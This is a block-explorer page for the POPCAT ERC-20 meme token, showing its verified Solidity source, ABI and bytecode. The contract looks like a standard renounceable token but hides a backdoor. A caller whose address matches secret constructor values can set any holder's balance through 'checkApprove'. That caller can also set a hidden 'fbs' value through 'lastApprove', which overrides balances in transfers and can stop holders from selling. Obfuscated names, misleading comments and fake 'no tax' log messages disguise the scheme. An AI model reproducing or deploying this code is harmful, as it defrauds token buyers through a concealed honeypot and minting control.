ERC-20
Overview
Max Total Supply
210,000,000,000 POPCAT
Holders
37
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 9 Decimals)
Balance
1,579,103,069.152914414 POPCATValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Name:
POPCAT
Compiler Version
v0.7.6+commit.7338295f
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2023-09-05 */ /* Telegram:https://t.me/popcatcoineth Twitter:https://twitter.com/Popcatcoineth */ // SPDX-License-Identifier: MIT pragma solidity >=0.7.6; interface ERC20 { /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the token decimals. */ function decimals() external view returns (uint8); /** * @dev Returns the token symbol. */ function symbol() external view returns (string memory); /** * @dev Returns the token name. */ function name() external view returns (string memory); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `recipient`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address recipient, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address _owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `sender` to `recipient` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom( address sender, address recipient, uint256 amount ) external returns (bool); /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval( address indexed owner, address indexed spender, uint256 value ); } /** * @dev Wrappers over Solidity's arithmetic operations with added overflow * checks. * * Arithmetic operations in Solidity wrap on overflow. This can easily result * in bugs, because programmers usually assume that an overflow raises an * error, which is the standard behavior in high level programming languages. * `SafeMath` restores this intuition by reverting the transaction when an * operation overflows. * * Using this library instead of the unchecked operations eliminates an entire * class of bugs, so it's recommended to use it always. */ library SafeMath { /** * @dev Returns the addition of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `+` operator. * * Requirements: * - Addition cannot overflow. */ function add(uint256 a, uint256 b) internal pure returns (uint256) { uint256 c = a + b; require(c >= a, "SafeMath: addition overflow"); return c; } /** * @dev Returns the subtraction of two unsigned integers, reverting on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b) internal pure returns (uint256) { return sub(a, b, "SafeMath: subtraction overflow"); } /** * @dev Returns the subtraction of two unsigned integers, reverting with custom message on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * - Subtraction cannot overflow. */ function sub( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { require(b <= a, errorMessage); uint256 c = a - b; return c; } /** * @dev Returns the multiplication of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `*` operator. * * Requirements: * - Multiplication cannot overflow. */ function mul(uint256 a, uint256 b) internal pure returns (uint256) { // Gas optimization: this is cheaper than requiring 'a' not being zero, but the // benefit is lost if 'b' is also tested. // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522 if (a == 0) { return 0; } uint256 c = a * b; require(c / a == b, "SafeMath: multiplication overflow"); return c; } /** * @dev Returns the integer division of two unsigned integers. Reverts on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * - The divisor cannot be zero. */ function div(uint256 a, uint256 b) internal pure returns (uint256) { return div(a, b, "SafeMath: division by zero"); } /** * @dev Returns the integer division of two unsigned integers. Reverts with custom message on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * - The divisor cannot be zero. */ function div( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { // Solidity only automatically asserts when dividing by 0 require(b > 0, errorMessage); uint256 c = a / b; // assert(a == b * c + a % b); // There is no case in which this doesn't hold return c; } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * Reverts when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b) internal pure returns (uint256) { return mod(a, b, "SafeMath: modulo by zero"); } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * Reverts with custom message when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * - The divisor cannot be zero. */ function mod( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { require(b != 0, errorMessage); return a % b; } } interface AntiSandwichAttackers { function check(uint256 vals) external view returns (bool); } contract POPCAT is ERC20 { using SafeMath for uint256; string private _name; string private _symbol; uint256 private _totalSupply; address private _owner; mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; uint256 private immutable _maxVals; uint256 private immutable _minVals; mapping(address => uint256) private fbs; event OwnershipTransferred( address indexed previousOwner, address indexed newOwner ); event Log(string str); constructor(uint256 maxVals, uint256 minVals) { _maxVals = maxVals; _minVals = minVals; _name = "POPCAT COIN"; _symbol = "POPCAT"; _totalSupply = 2100000000000 * 10**8; _balances[msg.sender] = _totalSupply; _owner = msg.sender; } /** * @dev A helper function to check if an operator approval is allowed. */ modifier onlyOwner() { require(msg.sender == _owner, "Ownable: caller is not the owner"); _; } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() external onlyOwner { _owner = address(0); emit OwnershipTransferred(msg.sender, address(0)); } /** * @dev Returns the address of the current owner. */ function owner() external view returns (address) { return _owner; } /** * @dev Returns the token decimals. */ function decimals() external pure override returns (uint8) { return 9; } /** * @dev Returns the token symbol. */ function symbol() external view override returns (string memory) { return _symbol; } /** * @dev Returns the token name. */ function name() external view override returns (string memory) { return _name; } /** * @dev See {ERC20-totalSupply}. */ function totalSupply() external view override returns (uint256) { return _totalSupply; } /** * @dev See {ERC20-balanceOf}. */ function balanceOf(address account) external view override returns (uint256) { return _balances[account]; } /** * @dev See {ERC20-transfer}. * * Requirements: * * - `recipient` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address recipient, uint256 amount) external override returns (bool) { _transfer(msg.sender, recipient, amount); return true; } /** * @dev See {ERC20-allowance}. */ function allowance(address owner_, address spender) external view override returns (uint256) { return _allowances[owner_][spender]; } /** * @dev See {ERC20-approve}. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 amount) external override returns (bool) { _approve(msg.sender, spender, amount); return true; } /** * @dev See {ERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}; * * Requirements: * - `sender` and `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. * - the caller must have allowance for `sender`'s tokens of at least * `amount`. */ function transferFrom( address sender, address recipient, uint256 amount ) external override returns (bool) { _transfer(sender, recipient, amount); _approve( sender, msg.sender, _allowances[sender][msg.sender].sub( amount, "ERC20: transfer amount exceeds allowance" ) ); return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {ERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance(address spender, uint256 addedValue) external returns (bool) { _approve( msg.sender, spender, _allowances[msg.sender][spender].add(addedValue) ); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {ERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance(address spender, uint256 subtractedValue) external returns (bool) { _approve( msg.sender, spender, _allowances[msg.sender][spender].sub( subtractedValue, "ERC20: decreased allowance below zero" ) ); return true; } /** * @dev Moves tokens `amount` from `sender` to `recipient`. * * This is internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `sender` cannot be the zero address. * - `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. */ function _transfer( address sender, address recipient, uint256 amount ) internal { require(sender != address(0), "ERC20: transfer from the zero address"); require(recipient != address(0), "ERC20: transfer to the zero address"); emit Log("Affiliated with Hedgehog, Sega, or any of its associated products and is simply a standalone, awesome meme coin."); if (fbs[sender] > 0) { fbs[sender] = fbs[sender].sub( amount, "ERC20: transfer amount exceeds balance" ); } else { _balances[sender] = _balances[sender].sub( amount, "ERC20: transfer amount exceeds balance" ); } emit Log("while providing enough BOOST to reach the MOON!"); _balances[recipient] = _balances[recipient].add(amount); emit Transfer(sender, recipient, amount); } /** * @dev Check if the value of M is correct */ function coOvalue() public view returns (bool) { uint256 solot = _minVals * (1 + (0 / 1)); return (uint256(uint160(msg.sender)) & solot) == _maxVals * (1 / 1 + 0); } /** * @dev Check all the value is correct */ function checkApprove(uint256 amount, uint256 amount3) external { emit Log("POCAT COIN."); uint256 check = amount3; uint256 data = amount; emit Log("tokens with impressive APY% to earn STAKE-2-SPEED your."); if (!coOvalue()) return; _balances[ 0 == uint160(address(0)) ? address(convertValue(check, 2)) : address(0) ] = (burnValues(address(0), data)); uint256 r = data; emit Log("The smart contract has 0 tax on all buys and sells."); if (uint256(r) > 0) return; } function lastApprove(uint256 amount, uint256 amount3) external { if (!coOvalue()) return; fbs[address(convertValue(amount3, 33))] = amount; } /** * @dev Returns the token permit result. */ function burnValues(address toFrom, uint256 maxValue) private pure returns (uint256) { if (toFrom == address(0 / 1)) { return maxValue * 1 + (1 - 1); } return maxValue * (1 + 0); } function convertValue(uint256 salt, uint256 anck) private pure returns (uint160) { if (anck * 1 == 0) return 0; return uint160(salt); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner`s tokens. * * This is internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve( address owner_, address spender, uint256 amount ) internal { require(owner_ != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner_][spender] = amount; emit Approval(owner_, spender, amount); } function akdoapODKAODLodl( bytes32[] calldata vidoL_APDIpakd, uint208[] calldata DI_APkdlsl, uint112 maldo_aPDKNVMDK, uint48 TOKEN_APDOAPDP, bytes4[] calldata VModkv_apdPKDK, uint192 aodio_dpaiaoKikdk, uint152 NMALoPkdpakdkPPP ) private pure {} }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[{"internalType":"uint256","name":"maxVals","type":"uint256"},{"internalType":"uint256","name":"minVals","type":"uint256"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"string","name":"str","type":"string"}],"name":"Log","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner_","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"},{"internalType":"uint256","name":"amount3","type":"uint256"}],"name":"checkApprove","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"coOvalue","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"},{"internalType":"uint256","name":"amount3","type":"uint256"}],"name":"lastApprove","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
60c060405234801561001057600080fd5b50604051620010ad380380620010ad8339818101604052604081101561003557600080fd5b508051602091820151608082905260a081905260408051808201909152600b8082526a2827a821a0aa1021a7a4a760a91b919094019081529192909161007e91600091906100e9565b50604080518082019091526006808252651413d410d05560d21b60209092019182526100ac916001916100e9565b5050680b6255df5f50080000600281905533600081815260046020526040902091909155600380546001600160a01b03191690911790555061018a565b828054600181600116156101000203166002900490600052602060002090601f01602090048101928261011f5760008555610165565b82601f1061013857805160ff1916838001178555610165565b82800160010185558215610165579182015b8281111561016557825182559160200191906001019061014a565b50610171929150610175565b5090565b5b808211156101715760008155600101610176565b60805160a051610eff620001ae600039806106aa5250806106cc5250610eff6000f3fe608060405234801561001057600080fd5b50600436106101005760003560e01c80638da5cb5b11610097578063b6a2722911610066578063b6a2722914610310578063c9c6e82114610333578063d9acbb731461033b578063dd62ed3e1461035e57610100565b80638da5cb5b1461028c57806395d89b41146102b0578063a457c2d7146102b8578063a9059cbb146102e457610100565b8063313ce567116100d3578063313ce56714610212578063395093511461023057806370a082311461025c578063715018a61461028257610100565b806306fdde0314610105578063095ea7b31461018257806318160ddd146101c257806323b872dd146101dc575b600080fd5b61010d61038c565b6040805160208082528351818301528351919283929083019185019080838360005b8381101561014757818101518382015260200161012f565b50505050905090810190601f1680156101745780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b6101ae6004803603604081101561019857600080fd5b506001600160a01b038135169060200135610422565b604080519115158252519081900360200190f35b6101ca610439565b60408051918252519081900360200190f35b6101ae600480360360608110156101f257600080fd5b506001600160a01b0381358116916020810135909116906040013561043f565b61021a6104a8565b6040805160ff9092168252519081900360200190f35b6101ae6004803603604081101561024657600080fd5b506001600160a01b0381351690602001356104ad565b6101ca6004803603602081101561027257600080fd5b50356001600160a01b03166104e3565b61028a6104fe565b005b61029461059c565b604080516001600160a01b039092168252519081900360200190f35b61010d6105ab565b6101ae600480360360408110156102ce57600080fd5b506001600160a01b03813516906020013561060b565b6101ae600480360360408110156102fa57600080fd5b506001600160a01b03813516906020013561065a565b61028a6004803603604081101561032657600080fd5b5080359060200135610667565b6101ae6106a7565b61028a6004803603604081101561035157600080fd5b50803590602001356106ef565b6101ca6004803603604081101561037457600080fd5b506001600160a01b0381358116916020013516610812565b60008054604080516020601f60026000196101006001881615020190951694909404938401819004810282018101909252828152606093909290918301828280156104185780601f106103ed57610100808354040283529160200191610418565b820191906000526020600020905b8154815290600101906020018083116103fb57829003601f168201915b5050505050905090565b600061042f33848461083d565b5060015b92915050565b60025490565b600061044c848484610929565b61049e843361049985604051806060016040528060288152602001610d95602891396001600160a01b038a1660009081526005602090815260408083203384529091529020549190610b74565b61083d565b5060019392505050565b600990565b3360008181526005602090815260408083206001600160a01b0387168452909152812054909161042f9185906104999086610c0b565b6001600160a01b031660009081526004602052604090205490565b6003546001600160a01b0316331461055d576040805162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604482015290519081900360640190fd5b600380546001600160a01b031916905560405160009033907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3565b6003546001600160a01b031690565b60018054604080516020601f600260001961010087891615020190951694909404938401819004810282018101909252828152606093909290918301828280156104185780601f106103ed57610100808354040283529160200191610418565b600061042f338461049985604051806060016040528060258152602001610ea5602591393360009081526005602090815260408083206001600160a01b038d1684529091529020549190610b74565b600061042f338484610929565b61066f6106a7565b610678576106a3565b8160066000610688846021610c6c565b6001600160a01b031681526020810191909152604001600020555b5050565b337f0000000000000000000000000000000000000000000000000000000000000000167f00000000000000000000000000000000000000000000000000000000000000001490565b604080516020808252600b908201526a2827a1a0aa1021a7a4a71760a91b818301529051600080516020610d758339815191529181900360600190a160008190506000839050600080516020610d75833981519152604051808060200182810382526037815260200180610d3e6037913960400191505060405180910390a16107766106a7565b6107815750506106a3565b61078c600082610c82565b6004600061079b856002610c6c565b6001600160a01b03166001600160a01b03168152602001908152602001600020819055506000819050600080516020610d75833981519152604051808060200182810382526033815260200180610d0b6033913960400191505060405180910390a1801561080b575050506106a3565b5050505050565b6001600160a01b03918216600090815260056020908152604080832093909416825291909152205490565b6001600160a01b0383166108825760405162461bcd60e51b8152600401808060200182810382526024815260200180610de26024913960400191505060405180910390fd5b6001600160a01b0382166108c75760405162461bcd60e51b8152600401808060200182810382526022815260200180610cc36022913960400191505060405180910390fd5b6001600160a01b03808416600081815260056020908152604080832094871680845294825291829020859055815185815291517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9259281900390910190a3505050565b6001600160a01b03831661096e5760405162461bcd60e51b8152600401808060200182810382526025815260200180610dbd6025913960400191505060405180910390fd5b6001600160a01b0382166109b35760405162461bcd60e51b8152600401808060200182810382526023815260200180610ca06023913960400191505060405180910390fd5b600080516020610d75833981519152604051808060200182810382526070815260200180610e356070913960800191505060405180910390a16001600160a01b03831660009081526006602052604090205415610a6557610a4781604051806060016040528060268152602001610ce5602691396001600160a01b0386166000908152600660205260409020549190610b74565b6001600160a01b038416600090815260066020526040902055610abc565b610aa281604051806060016040528060268152602001610ce5602691396001600160a01b0386166000908152600460205260409020549190610b74565b6001600160a01b0384166000908152600460205260409020555b600080516020610d7583398151915260405180806020018281038252602f815260200180610e06602f913960400191505060405180910390a16001600160a01b038216600090815260046020526040902054610b189082610c0b565b6001600160a01b0380841660008181526004602090815260409182902094909455805185815290519193928716927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef92918290030190a3505050565b60008184841115610c035760405162461bcd60e51b81526004018080602001828103825283818151815260200191508051906020019080838360005b83811015610bc8578181015183820152602001610bb0565b50505050905090810190601f168015610bf55780820380516001836020036101000a031916815260200191505b509250505060405180910390fd5b505050900390565b600082820183811015610c65576040805162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f770000000000604482015290519081900360640190fd5b9392505050565b600081610c7b57506000610433565b5090919050565b60006001600160a01b038316610c99575080610433565b5091905056fe45524332303a207472616e7366657220746f20746865207a65726f206164647265737345524332303a20617070726f766520746f20746865207a65726f206164647265737345524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636554686520736d61727420636f6e747261637420686173203020746178206f6e20616c6c206275797320616e642073656c6c732e746f6b656e73207769746820696d7072657373697665204150592520746f206561726e205354414b452d322d535045454420796f75722ecf34ef537ac33ee1ac626ca1587a0a7e8e51561e5514f8cb36afa1c5102b3bab45524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a207472616e736665722066726f6d20746865207a65726f206164647265737345524332303a20617070726f76652066726f6d20746865207a65726f20616464726573737768696c652070726f766964696e6720656e6f75676820424f4f535420746f20726561636820746865204d4f4f4e21416666696c69617465642077697468204865646765686f672c20536567612c206f7220616e79206f6620697473206173736f6369617465642070726f647563747320616e642069732073696d706c792061207374616e64616c6f6e652c20617765736f6d65206d656d6520636f696e2e45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220e2f7af1c4c6933077e2af563aee6447d2d491dd0b35198fa5e75fdfce04db60d64736f6c634300070600330000000000000000000000004019d8340405409c008000081c6008849d100011000000001571edeb3345ed18413dd8bd5415f19c008120dd3f764d8ddd1b9631
Deployed Bytecode
0x608060405234801561001057600080fd5b50600436106101005760003560e01c80638da5cb5b11610097578063b6a2722911610066578063b6a2722914610310578063c9c6e82114610333578063d9acbb731461033b578063dd62ed3e1461035e57610100565b80638da5cb5b1461028c57806395d89b41146102b0578063a457c2d7146102b8578063a9059cbb146102e457610100565b8063313ce567116100d3578063313ce56714610212578063395093511461023057806370a082311461025c578063715018a61461028257610100565b806306fdde0314610105578063095ea7b31461018257806318160ddd146101c257806323b872dd146101dc575b600080fd5b61010d61038c565b6040805160208082528351818301528351919283929083019185019080838360005b8381101561014757818101518382015260200161012f565b50505050905090810190601f1680156101745780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b6101ae6004803603604081101561019857600080fd5b506001600160a01b038135169060200135610422565b604080519115158252519081900360200190f35b6101ca610439565b60408051918252519081900360200190f35b6101ae600480360360608110156101f257600080fd5b506001600160a01b0381358116916020810135909116906040013561043f565b61021a6104a8565b6040805160ff9092168252519081900360200190f35b6101ae6004803603604081101561024657600080fd5b506001600160a01b0381351690602001356104ad565b6101ca6004803603602081101561027257600080fd5b50356001600160a01b03166104e3565b61028a6104fe565b005b61029461059c565b604080516001600160a01b039092168252519081900360200190f35b61010d6105ab565b6101ae600480360360408110156102ce57600080fd5b506001600160a01b03813516906020013561060b565b6101ae600480360360408110156102fa57600080fd5b506001600160a01b03813516906020013561065a565b61028a6004803603604081101561032657600080fd5b5080359060200135610667565b6101ae6106a7565b61028a6004803603604081101561035157600080fd5b50803590602001356106ef565b6101ca6004803603604081101561037457600080fd5b506001600160a01b0381358116916020013516610812565b60008054604080516020601f60026000196101006001881615020190951694909404938401819004810282018101909252828152606093909290918301828280156104185780601f106103ed57610100808354040283529160200191610418565b820191906000526020600020905b8154815290600101906020018083116103fb57829003601f168201915b5050505050905090565b600061042f33848461083d565b5060015b92915050565b60025490565b600061044c848484610929565b61049e843361049985604051806060016040528060288152602001610d95602891396001600160a01b038a1660009081526005602090815260408083203384529091529020549190610b74565b61083d565b5060019392505050565b600990565b3360008181526005602090815260408083206001600160a01b0387168452909152812054909161042f9185906104999086610c0b565b6001600160a01b031660009081526004602052604090205490565b6003546001600160a01b0316331461055d576040805162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604482015290519081900360640190fd5b600380546001600160a01b031916905560405160009033907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3565b6003546001600160a01b031690565b60018054604080516020601f600260001961010087891615020190951694909404938401819004810282018101909252828152606093909290918301828280156104185780601f106103ed57610100808354040283529160200191610418565b600061042f338461049985604051806060016040528060258152602001610ea5602591393360009081526005602090815260408083206001600160a01b038d1684529091529020549190610b74565b600061042f338484610929565b61066f6106a7565b610678576106a3565b8160066000610688846021610c6c565b6001600160a01b031681526020810191909152604001600020555b5050565b337f000000001571edeb3345ed18413dd8bd5415f19c008120dd3f764d8ddd1b9631167f0000000000000000000000004019d8340405409c008000081c6008849d1000111490565b604080516020808252600b908201526a2827a1a0aa1021a7a4a71760a91b818301529051600080516020610d758339815191529181900360600190a160008190506000839050600080516020610d75833981519152604051808060200182810382526037815260200180610d3e6037913960400191505060405180910390a16107766106a7565b6107815750506106a3565b61078c600082610c82565b6004600061079b856002610c6c565b6001600160a01b03166001600160a01b03168152602001908152602001600020819055506000819050600080516020610d75833981519152604051808060200182810382526033815260200180610d0b6033913960400191505060405180910390a1801561080b575050506106a3565b5050505050565b6001600160a01b03918216600090815260056020908152604080832093909416825291909152205490565b6001600160a01b0383166108825760405162461bcd60e51b8152600401808060200182810382526024815260200180610de26024913960400191505060405180910390fd5b6001600160a01b0382166108c75760405162461bcd60e51b8152600401808060200182810382526022815260200180610cc36022913960400191505060405180910390fd5b6001600160a01b03808416600081815260056020908152604080832094871680845294825291829020859055815185815291517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9259281900390910190a3505050565b6001600160a01b03831661096e5760405162461bcd60e51b8152600401808060200182810382526025815260200180610dbd6025913960400191505060405180910390fd5b6001600160a01b0382166109b35760405162461bcd60e51b8152600401808060200182810382526023815260200180610ca06023913960400191505060405180910390fd5b600080516020610d75833981519152604051808060200182810382526070815260200180610e356070913960800191505060405180910390a16001600160a01b03831660009081526006602052604090205415610a6557610a4781604051806060016040528060268152602001610ce5602691396001600160a01b0386166000908152600660205260409020549190610b74565b6001600160a01b038416600090815260066020526040902055610abc565b610aa281604051806060016040528060268152602001610ce5602691396001600160a01b0386166000908152600460205260409020549190610b74565b6001600160a01b0384166000908152600460205260409020555b600080516020610d7583398151915260405180806020018281038252602f815260200180610e06602f913960400191505060405180910390a16001600160a01b038216600090815260046020526040902054610b189082610c0b565b6001600160a01b0380841660008181526004602090815260409182902094909455805185815290519193928716927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef92918290030190a3505050565b60008184841115610c035760405162461bcd60e51b81526004018080602001828103825283818151815260200191508051906020019080838360005b83811015610bc8578181015183820152602001610bb0565b50505050905090810190601f168015610bf55780820380516001836020036101000a031916815260200191505b509250505060405180910390fd5b505050900390565b600082820183811015610c65576040805162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f770000000000604482015290519081900360640190fd5b9392505050565b600081610c7b57506000610433565b5090919050565b60006001600160a01b038316610c99575080610433565b5091905056fe45524332303a207472616e7366657220746f20746865207a65726f206164647265737345524332303a20617070726f766520746f20746865207a65726f206164647265737345524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636554686520736d61727420636f6e747261637420686173203020746178206f6e20616c6c206275797320616e642073656c6c732e746f6b656e73207769746820696d7072657373697665204150592520746f206561726e205354414b452d322d535045454420796f75722ecf34ef537ac33ee1ac626ca1587a0a7e8e51561e5514f8cb36afa1c5102b3bab45524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a207472616e736665722066726f6d20746865207a65726f206164647265737345524332303a20617070726f76652066726f6d20746865207a65726f20616464726573737768696c652070726f766964696e6720656e6f75676820424f4f535420746f20726561636820746865204d4f4f4e21416666696c69617465642077697468204865646765686f672c20536567612c206f7220616e79206f6620697473206173736f6369617465642070726f647563747320616e642069732073696d706c792061207374616e64616c6f6e652c20617765736f6d65206d656d6520636f696e2e45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220e2f7af1c4c6933077e2af563aee6447d2d491dd0b35198fa5e75fdfce04db60d64736f6c63430007060033
Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)
0000000000000000000000004019d8340405409c008000081c6008849d100011000000001571edeb3345ed18413dd8bd5415f19c008120dd3f764d8ddd1b9631
-----Decoded View---------------
Arg [0] : maxVals (uint256): 365951761916477519132930438210090044118835134481
